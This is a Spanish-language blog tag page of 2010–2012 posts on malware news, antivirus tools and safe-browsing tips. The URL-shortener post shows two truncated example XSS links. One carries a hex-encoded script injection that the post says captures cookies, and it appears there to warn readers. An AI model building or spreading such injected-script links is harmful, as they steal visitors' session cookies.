Mostrando entradas con la etiqueta virus. Mostrar todas las entradas
Mostrando entradas con la etiqueta virus. Mostrar todas las entradas

Sistema global para firmas de Antivirus

Por Máximo Patiño 07/09/2012
 Sistema global para firmas de Antivirus
  
Las nuevas tendencias de malware a nivel mundial, exponen nuevos retos para la industria de tecnologías para la seguridad de la información. En el caso particular me quiero referir en este post a los programas de antivirus. El antivirus es el emblema de "me siento seguro". De hecho, muchas empresas dependen de esta herramienta para evitar ser infectados de malware.

Expertos advierten sobre los posibles hackeos a vehiculos

Por Yonuery de la Cruz  22/08/2012
Fisker

Mientras en nuestro país estamos mejorando el gas natural para nuestros vehículos McAfee e Intel están tomando la iniciativa de una forma un poco más moderna  mejorando los ordenadores y sistema de comunicación electrónica y censores que se construyen en cada vehículo. 

500K Android infectado por un malware en China

Por Robert Guzmán 19/08/2012
500K Android infectado por un malware en China


Un duro golpe para Android, pero esta vez no es en los tribunales sino en territorio chino, uno de los lugares donde mas abundan los malware para Android. Hay varios motivos por ello: la gran cantidad de usuarios que utilizan estos smartphones y el hecho de que existen múltiples plataformas de distribución paralelas a Google Play, ya que su uso y presencia es más limitada y regulada. El último caso de malware ya ha infectado a más de 500.000 teléfonos.

Virus Shamoon: Ataque enfocado a la industria energética.

Por Máximo Patiño 17/08/2012
He recibido varias alertas con respecto a un nuevo malware o virus que se ha desatado en la industria de energia. Se trata del Shamoon o W32/DistTrack el tiene un comportamiento destructivo, dejando las computadores infectadas totalmente inservibles.

Malware Gauss: Como detectarlo en tu sistema.

Por Máximo Patiño 13/08/2012
 Kaspersky puede aliminar malware gauss
Hace unos días les comentábamos sobre el malware GAUSS, un APT (Advanced Persistent Threat) que roba contraseñas y credenciales bancarios de los usuarios con fines maliciosos. Con respecto a estos acontecimientos están disponibles dos mecanismos online para identificar la infección de GAUSS en su sistema.

Las 5 mejores apps de seguridad gratuitas para Android

Robert Guzmán 09/08/2012



El tema de seguridad en este blog no es mi fuerte, en realidad eso le corresponde a Maximo, pero no podía dejar de pasar esta oportunidad para proporcionarles esta información ya que la cantidad de usuarios de Android esta aumentando en RD pero pocos saben que su móvil debe protegerlo con un buen antivirus y mucho menos como instalarlo.

Un antivirus nunca esta de mas y mucho menos para Android y mas aun si esta rooteado, aunque depende del uso que hagas del smartphone o tablet. Para ello no importa si sólo descargas apps de Google Play o navegas por sitios de confianza. Hoy en día los mejores antivirus gratuitos no se limitan a la protección antimalware y ofrecen además funciones anti-robo, ya sea para localizar, bloquear tu dispositivo o borrar los datos.

GAUSS: sistema atacando los bancos Libaneses es relacionado con Stuxnet y Flame

Por Máximo Patiño 09/08/2012


Les recomiendo tener cuidado en todo lo que publican y ven en la web porque el día de hoy los investigadores de la firma de seguridad Kaspersky Lab han descubierto lo que parece otro sistema para realizar espionaje en la red, diseñado para robar data de individuos.

Malware de Android compra apps a escondidas

Por Alan Aquino 31/07/2012

El programa malicioso MMarketPay.A descarga apps pagas sin consentimiento del usuario. Por el momento, el ataque fue contra clientes de China Mobile, pero podría extenderse

La empresa de seguridad G Data dio a conocer que el nuevo malware se llama MMarketPay.A y se camufla en apps como GO WeatherTravel Sky o E-Strong File Explorer. Hasta ahora, los ataques se dirigen contra usuarios de China Mobile, proveedor de telefonía móvil, pero expertos no descartan que se extienda a Europa, USA y Latino America.

Nuevo troyano para Mac

Por Robert Guzman 28 / 10 / 2011

ESET reportó la aparición de una nueva versión del troyano Linux/Tsunami, adaptada para atacar sistemas operativos Mac OS.
La firma reveló que Tsunami convierte los equipos en integrantes de una botnet utilizada para realizar ataques de Denegación Distribuida de Servicios (DDoS).
Según ESET, Tsunami contiene una lista de servidores Internet Relay Chat (IRC) y canales a los que intenta conectarse y, cuando se acciona, el equipo infectado lanza ataques DDoS a páginas Web.
Voceros de la compañía indicaron que el troyano abre una puerta trasera en el equipo que puede ser utilizada para la descarga de malware, la actualización del código de Tsunami o, incluso, el control completo del equipo infectado por parte del ciberatacante.
Asismismo, ESET reportó que, con la actualización, Tsunami tiene capacidad para replicarse a sí mismo y dispone de información actualizada del servidor remoto al cual reporta.


Siete cosas que no sabías sobre los virus informáticos


¿Te consideras un maestro cuando el asunto es la seguridad digital? Aunque la respuesta sea “sí”, hay mucho sobre virus y otros malwares que pocos conocen.

Verifica nuestras sugerencias para conocer un poco más sobre los archivos maliciosos y comprender que no siempre poseer un antivirus y un firewall poderoso es suficiente para estar completamente libre de amenazas
1) Infecciones no suceden solo con los otros
No es difícil encontrar personas que piensan que las plagas virtuales solo alcanzan las computadoras de los amigos. Desafortunadamente, esto no es verdad, pues, cómo sabemos, todas las máquinas están igualmente sujetas a invasiones o contaminaciones. Los usuarios deben concientizarse sobre las formas correctas de utilización. Hasta se puede decir que algunos dogmas deben ser dejados de lado.
2) Mac y Linux también poseen virus
Si no utilizas el sistema operativo de Windows, puedes tranquilizarte, pero esto no significa que descuidarte completamente de los peligros existentes en internet es una buena idea. Decir que Mac OS X es invulnerable dejo de ser verdad hace algunos años. Lo mismo se aplica a las diversas distribuciones de Linux, que pueden ser muy estables, pero no son indestructibles.
Se estima que cerca de 99% de los códigos maliciosos encontrados en internet fueron creados para alcanzar el sistema operativo de Microsoft. El principal motivo para esto es la parcela del mercado ocupada por el programa (más de 90% en todo el mundo), lo que incentiva los crackers a encontrar formas de burlarlo.
Es necesario recordar que usuarios maliciosos son movidos por su egocentrismo. Cuanto más visible esté su trabajo, más satisfecho quedará. Por esta razón hay menos “glamor” en crear virus u otros malwares para los sistemas Mac y Linux. Con la creciente popularización de ellos, los peligros aumentan en la misma proporción.
Vulnerabilidad varía en cada SO
Como todos los sistemas operativos son creados con líneas de comando propias y otras peculiaridades, las fallas también son únicas y no son repetidas en otros programas. Sabiendo de esto, queda claro que los virus creados para Windows no son amenazas para otros sistemas operativos.
3) Malwares viven en ecosistemas
Puede parecer que virus son apenas archivos siendo ejecutados solos, pero la verdad es otra. Virus, troyanos, worms y otros malwares trabajan de forma complementar en las computadoras. Por ejemplo: un troyano almacenado en una máquina puede ser activado para que una puerta sea abierta. De esta forma, otras plagas pueden entrar o un cracker puede asumir el control.
Otro tipo de invasión que ocurre frecuentemente puede ser demostrada de la siguiente forma: archivos maliciosos desactivan apenas sectores de firewalls, de esta forma las computadoras no emiten alertas de desactivación de la protección y los crackers pueden infectar los discos duros con más virus.
Vienen de muchos lugares
No pienses que los virus solo son encontrados en páginas de contenido adulto o ilegal, pues están en todos los lugares. Hoy, uno de los mayores diseminadores de plagas virtuales son las memorias USB. En universidades, escuelas o empresas, memorias USB son conectados en máquinas infectadas y así empieza una epidemia.
No podemos olvidarnos de los correos electrónicos contaminados, frutos de cuentas invadidas o listas de contactos perdidas. Por medio de estos correos son repasados miles de archivos o enlaces infeccionados todos los días. Realzamos que: es extremamente importante tener cuidado con todos los tipos de mensajes abiertos y multimedias inseridas a las computadoras.
4) Computadoras pueden ser zombis
Si, no leíste una mentira. Hay un tipo de plaga virtual conocido como botnet que transforma las computadoras infectadas en computadoras zombis. Estas máquinas pueden ser controladas remotamente por crackers que desean transmitir informaciones para servidores remotos o para despistar posibles rastreos en los casos de invasión de computadoras o sistemas.
5) Phishing es la nueva amenaza
Después que surgió el famoso virus “I Love You”, una enorme gama de nuevos malwares que también traían nombres atractivos fueron creados, estimulando a los usuarios para hacer clic en correos electrónicos contaminados. Hoy los archivos maliciosos viven un periodo parecido, pero la moda del momento es la práctica de Phishing.
Es necesario tomar mucho cuidado, pues estos archivos maliciosos son distribuidos disfrazados, generalmente con un diseño muy parecido con el original. Es muy común que usuarios mal informados hagan clic sobre los enlaces que te envían para direcciones infecciosas. Recuérdate que los bancos jamás envían correos con enlaces para alteración de registro o informaciones parecidas.
6) No recomendamos poseer más de un antivirus
Puede parecer que utilizar dos programas de protección contra virus es una excelente idea, pero en realidad es lo contrario. Al en vez de duplicar la protección, hay dos problemas muy grandes que son originados con esta práctica. El primero es la posibilidad de conflictos entre las aplicaciones, resultando en fendas en el sistema.
El otro problema es menos perjudicial para los sistemas operativos, pero también puede molestar mucho. Debido al gran volumen de informaciones siendo computadas, hay una sobrecarga en la memoria RAM y también en el procesador, lo que puede originar lentitud en las máquinas y hasta algunas trabas, dependiendo del caso.
La verificación de archivos online
¿Tienes la sensación de estar con la computadora infectada? Después de verificar toda la computadora, tu antivirus dijo que no hay problemas y ¿aún temes por la seguridad de tu máquina? Llegó el momento de conocer algunas herramientas online que garantizan una segunda opinión para tu sistema.
Análisis online
Con programas de verificación online, es posible realizar una verificación completa en tu computadora, incluyendo discos removibles. Pero si tu voluntad es saber sobre algún determinado archivo, la mejor elección es VirusTotal. Esta herramienta (utilizada por los analistas de Bajakí) verifica archivos de hasta 100 MB con todos los principales antivirus de la actualidad.
Actualizaciones son útiles
¿Sabes para qué sirven las actualizaciones? Es muy simple: cuando un programa es desarrollado, posee aplicaciones de seguridad necesarias para que los usuarios estén protegidos. El problema es que surgen nuevos archivos maliciosos y es necesario desarrollar mejorías en los sistemas: son las actualizaciones.
Esto no vale apenas para los antivirus, pero también para otros programas, principalmente aquellos que poseen conexión con internet. Actualizando las aplicaciones, evitas que varias fendas de seguridad queden expuestas en tu computadora.
7) El mejor antivirus eres tu
Esto no debe ser una novedad, a final de cuentas, todas las sugerencias que dimos en este artículo están relacionadas a los cuidados con la utilización. Aún, existen algunos puntos importantes. De nada sirve poseer antivirus poderosos si el usuario no los actualiza siempre que es necesario. También no sirve un firewall si no hay cuidados con los clics.
No es una exageración decir que somos los únicos antivirus confiables que existen. Sigue siempre los pasos de seguridad para que puedas navegar tranquilamente por internet. Mantén siempre tus aplicaciones actualizadas y ten cuidado con lo que visitas. Siendo consciente, es muy difícil ser infectado (haz clic aquí para conocer los peores hábitos que podemos tener en la web).

El peligro de los acortadores de enlace URL

Hoy en dia, gracias al furor que ha tenido twitter y otras redes sociales,  se ha hecho muy  comun utilizar paginas que nos brindan el servicio de acortar las direcciones. Este servicio es muy util, ya que  nos permiten  acortar aquellas urls, que  son demasiado largas y que son dificiles de recordar. Su uso  es muy sencillo solo basta con entrar a un sitio de tantos en la red que  nos dan este servicio  como por ejemplo: Bit.ly o tinyurl.com alli en una caja de texto pegamos la url que deseamos recortar  damos click en el boton y listo tendremos nuestra url recortada, algo asi como esto:
http://bit.ly/4G4ueH
http://tinyurl.com/ykfuc64
Sin embargo, esto puede llegar a convertirse en un arma de doble filo, debido a que  algun individuo de forma malintencionada puede “camuflar” una url infectada con algun troyano, o una url con un script que capture tus cookies (XSS). Y esto como ocurre?? Hay gente que puede caer en un truco tan viejo?? La respuesta es SI. Pongamos un ejemplo, un informatico  ve  que  una nena  muy linda, comparte un enlace de este tipo:
http://sitio.com/prueba.php?variable=”>
o este:
http://host/a.php?variable=%22%3e%3c%73%63%72%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%6
Para cualquier persona con sentido comun (bueno eso creo y espero)  que vea este enlace, lo va a ver sospechoso y sabra que ese enlace no es lo que dice ser la nena linda.  Pero que pasaria si se usa una web que nos recorta la url? Nuestro enlace malicioso quedaria asi:
http://bit.ly/2SOKtG
o asi:
http://bit.ly/3hPNpy
Ahora si, mas de una persona daria click en ese enlace, si la nena linda dice que en esa pequeña url se encuentran sus fotos desnuda. Igualmente suele suceder con el malware, muchas veces viene camuflado de esa forma, y  algunas personas  dan click sin pensar que hay detras de esa url corta.

Recomendaciones.

  • Tener sentido comun, y no dar click en cualquier enlace.
  • No visitar enlaces sospechosos compartidos por mujeres voluptuosas  o en su defecto hombres.
  • Antes de dar click en una url de este tipo, pase el puntero por el enlace, y este le va a mostrar la verdadera url, de tal forma, sabras hacia donde te  lleva el enlace.
Estas son pequeñas cosas,  pero  que muchos usuarios de la red no lo saben,  y son blancos faciles de todo el malware que existe en la red.
Via Audiencia Electronica

Cada día se crean 73 mil nuevos virus

Además, PandaLabs alerta de un incremento significativo en el número de downloaders, unos nuevos troyanos preparados para descargar todo tipo de malware una vez infectado el ordenador de la víctima. Estos programas son realmente ligeros y suelen pasar inadvertidos, ya que están compuestos por unas cuantas líneas de código cuya misión es conectarse a Internet para descargar nuevo malware.
Malware tarta PandaLabs
Según la compañía, cada vez es más sencillo desarrollar troyanos gracias a la proliferación de herramientas que permiten elaborarlos sin conocimientos técnicos. Los virus siguen representando un buen porcentaje del malware registrado, con un 16,82%, seguidos de los gusanos, que acaparan el 7,77%.

Google lanza una actualización para el malware de Android

Precisamente ayer hablábamos en nuestro podcast de las maliciosas 21 apps que habían estado acampando a sus anchas en terminales androides y, mira por dónde, hoy recibimos noticias (positivas) al respecto. Google ha anunciado que ya se encuentra lanzando una actualización para los teléfonos infectados llamada 'Android Market Security Tool March 2011', que será añadida remotamente a los smartphones (unos 260.000 según TechCrunch) para proceder a su limpieza total, y que se acompañará de un email de notificación a los dueños de los citados dispositivos. Según se cree, el malware (que no afectaba a la versión 2.2.2 ni superiores) únicamente ha podido hacerse con el IMEI de los terminales, además de registrar la versión de SO móvil que estaban corriendo.

Por supuesto, las medidas tomadas por la compañía no terminan aquí, de forma que Google ha dejado saber también que todos los programas (que por cierto podrían haber llegado a ser un total de 58 y no 21) han sido ya radicalmente eliminados del Android Market, suspendiendo las cuentas de desarrolladores de los culpables y tomando las medidas legales oportunas. Igualmente ha comunicado que ya ha empezado a estudiar nuevas vías de seguridad que eviten que esto vuelva a pasar -porque buena se ha liado, vaya-. A ver si es verdad.

Once aplicaciones gratis para combatir los virus

Por Robert Connection 19 / 11 / 2010


NoVirusThanks es un proyecto que empezó en el año 2008 y cuyo objetivo primario es crear software y servicios relacionados con la seguridad de Internet y de nuestros ordenadores. Con un total de 11 aplicaciones, todas ellas gratuitas, NoVirusThanks es como una barrera de cara a posibles infecciones que nos ayuda a mantenernos al margen de todo tipo de porquerías y peligros que acechan en la web. Paso a contaros muy por encima cual es el cometido de cada uno y para qué pueden sernos útiles.
NoVirusThanks Malware Remover, ya mencionado, ideal para detectar y acabar con troyanos y demás spyware.
MD5 Checksum Tool, una aplicación diseñada para generar checksums o sumas de verificación de forma muy simple, para asegurarnos de que nuestros archivos no han sido alterados en ningún sentido.
Web Browsers Traces Eraser nos ayuda a borrar nuestras huellas en un total de 16 navegadores y entornos diferentes incluyendo el propio sistema.
Fast Folder Eraser, ideal para eliminar carpetas con muchos archivos de forma definitiva e instantánea.
NoVirusThanks Uploader nos permite enviar archivos sospechosos a NoVirusThanks para su posterior examen e identificación de posibles peligros.
Websites Cop es un programa que nos avisa en tiempo real mediante email de si uno de nuestros sitios web ha sido modificado.
Square Privacy Cleaner, igual que Web Browsers Traces Eraser pero centrado en el sistema, es capaz de deshacerse de cualquier histórico o elemento almacenado en caché.
Hijack Hunter realiza un exhaustivo análisis de nuestro ordenador y muestra un resumen al detalle para así ayudarnos a detectar comportamientos inadecuados en el mismo.
Zeus Trojan Remover se centra en detectar y acabar con el troyano Zeus en todas sus formas y variantes.
Threat Killer es capaz de eliminar archivos que el sistema no permite eliminar y terminar procesos incluso cuando estos son críticos.
NoVirusThanks Anti-Rootkit es una sofisticada herramienta de análisis cuyo objetivo es detectar rootkits y demás malware de una forma exhaustiva, analizando procesos y drivers ocultos. Cuenta con dos versiones, una gratuita y una comercial cuya licencia vale 19.99$ y que además trae soporte técnico incluido.
Una completa suite en forma de descargas individuales y poco pesadas entre las que no sólo hay programas centrados en proteger nuestros equipos sino también utilidades para ayudarnos a mantener la integridad física de nuestros archivos. Y además todo ello de forma gratuita. Tal vez lo único que le falta es precisamente que también se distribuya en forma de suite, permitiendonos adquirir todas las aplicaciones de una sola vez.

Kaspersky descubre el primer troyano para Android

Si alguien pensaba que Android se iba a quedar exento de riegos víricos, que se vaya bajando de su autobús de fantasía en la calle de la piruleta, porque Kaspersky Labs, una de las mayores empresas dedicadas al negocio de la eliminación de software malintencionado, ha descubierto el primer troyano androide.

Este es un troyano que se introduce a través de los SMS y puede hacer que el sistema envíe mensajes y realice llamadas a números de tarificación adicional sin consentimiento del propietario. su nombre es "Trojan-SMS.AndroidOS.FakePlayer.a" y se camufla en forma de reproductor de medios de apariencia totalmente legítima en móviles con cualquier versión de Android en sus entrañas.

¿Se habrá abierto definitivamente la Caja de Pandora en estos dispositivos, o será sólo un simple caso aislado? El tiempo nos lo dirá.
 
Via Engadget 

Olympus avisa: algunas µ Tough-6010 vendidas en Japón contienen un virus informático

Hay que ver cómo andamos de virus últimamente. La nueva compañía en colgarse el cartel de cuarentena no es otra que Olympus, que ha anunciado y reconocido mediante nota oficial que algunas de sus cámaras vendidas en Japón contienen una sorpresita nada agradable para sus poseedores. Concretamente se refiere a las compactas todo terreno µ Tough-6010, que vendrían con un virus informático en su memoria interna deseoso de conocer y explorar "nuevo mundo" en cuanto la cámara se conecte al PC. Por suerte, es algo que únicamente afecta (que se sepa) al mercado japonés, pero por si, casualidades de la vida, viajaste hace poco al bonito país asiático y te agenciaste una µ Tough-6010, no estaría de más que comprobaras si tu unidad es una de las afectadas y, de ser así, seguir los pasos que Olympus indica para limpiar toda infección posible. Suerte con la cura.
 
Via Engadget 

OpinionSpy, el último spyware encontrado para Mac OS X

apple-spyware-mac.jpg
Hace unos dias desayunábamos con la noticia de que Google planea dejar de usar Windows en los ordenadores de sus empleados, y como si de una casualidad se tratase, hoy lo hacemos sabiendo la existencia de aplicaciones de Mac OS X que contienen spyware. La compañía de antivirus Intego lo ha descubierto en una serie de escaneos rutinarios y todo parece indicar que estamos ante un bicho peligroso.

Conocido como OSX/OpinionSpy, el spyware no está contenido dentro de las aplicaciones sospechosas sino que es descargado durante el proceso de instalación de las mismas, por lo que el usuario no tiene por qué enterarse de lo que realmente está ocurriendo.

¿Virus en la microSD del Samsung Wave?

Vaya, resulta que el Samsung Wave que hemos analizado en profundidad, podría venir con una sorpresita inesperada. Resulta que algunas unidades distribuidas en Alemania vienen con un troyano en su microSD de 1GB. Se trata del archivo "slmvsrv.exe" y no tenemos ni idea qué hace exactamente, aunque tampoco vamos a probar para averiguarlo.

Lo mejor es que si te encuentras con este inesperado polizón en tu Wave, formatees la tarjeta empleando un buen antivirus para no correr riesgos.
 
Via Engadget

Mac también se infectan

Los cibercriminales utilizan como gancho las actualizaciones del Snow Leopard para distribuir un troyano entre los equipos de Apple. Que los Mac no son blanco de virus, es una afirmación que pasó ya a la historia. Hace tiempo que los fabricantes de antivirus vienen avisando del creciente peligro que corren los confiados usuarios de estos sistemas. El reciente lanzamiento del último sistema operativo de Apple ha sido, de hecho, usado por los cibercriminales como gancho para distribuir un virus. En concreto, Trend Micro advierte de la existencia de páginas web falsas que ofrecen actualizaciones gratuitas de Snow Leopard para descargar un troyano.

Según el fabricante de seguridad, cuando los usuarios acceden a dichas páginas web se encuentran con un troyano que modifica el DNS, identificado como OSX_JAHLAV.K. Una vez ejecutado, OSX_JAHLAV.K. decodifica el código que incluye un script que descarga otro script malicioso. Dicho script altera la configuración DNS e incluye dos direcciones IP adicionales en su servidor DNS.

De este modo, es posible que los usuarios sean redirigidos a páginas web de phishing y otros sites fraudulentos. De hecho, algunos de estos sitios falsos están supuestamente alojando variantes y componentes de FAKEAV (un antivirus falso).

Todas las URLs maliciosas ya han sido bloqueadas por Trend Micro, al mismo tiempo que se ha advertido a los usuarios que solamente adquieran las actualizaciones de Snow Leopard directamente desde el site de Apple.

Via Audiencia Electronica 

El spam le cuesta 1.8 millones de dólares a las grandes empresas!!! oouch

Por Robert Guzman 30 / 03 / 2010 


 
Según un estudio elaborado por Antispameurope, una empresa promedio, con una plantilla de 1.000 empleados, puede gastar unos 1.8 millones de dólares (1.2 millones de euros) al año en la gestión del spam. De esos 1.8 millones de dólares, 7,000 se emplean en soluciones internas de gestión de la seguridad. El espacio del disco duro desperdiciado debido al correo basura cuesta a las empresas unos 220,000 dólares de media, empleados en recursos como, por ejemplo, discos duros para mantener un tráfico regular del correo electrónico, a la vez que las empresas deben enfrentar el bombardeo masivo de correo basura...


Aún así, el coste real del spam es tan sutil, que pasa inadvertido: la pérdida de productividad debido al spam puede cuantificarse en 1.5 millones de dólares al año, en empresas de 1,000 usuarios. Este coste, sólo se acumula, con una media de un par de minutos de tiempo de cada trabajador, empleado sólo en la revisión de su correo y en la eliminación del spam.

 
Diseñado por RDConnection.net | Diseñada para RDConnection.net | Robert Guzman